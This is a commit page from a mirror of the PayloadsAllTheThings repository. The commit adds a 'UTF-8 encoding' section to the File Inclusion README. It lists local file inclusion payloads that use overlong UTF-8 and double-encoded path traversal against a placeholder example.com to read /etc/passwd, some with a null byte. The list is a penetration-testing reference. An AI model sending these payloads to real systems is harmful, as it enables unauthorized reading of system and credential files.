Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

UTF-8 encoding for File Inclusion

Browse source
This commit is contained in:
Swissky 2019-06-29 11:20:17 +02:00
parent b148a9c906
commit 3b85f1b6fc
1 changed files with 8 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
File Inclusion/README.md
View file

@ -10,6 +10,7 @@
* [Basic LFI](#basic-lfi)
* [Null byte](#null-byte)
* [Double encoding](#double-encoding)
* [UTF-8 encoding](#utf-8-encoding)
* [Path and dot truncation](#path-and-dot-truncation)
* [Filter bypass tricks](#filter-bypass-tricks)
* [Basic RFI](#basic-rfi)
@ -58,6 +59,13 @@ http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### UTF-8 encoding
```powershell
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
```
### Path and dot truncation
On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.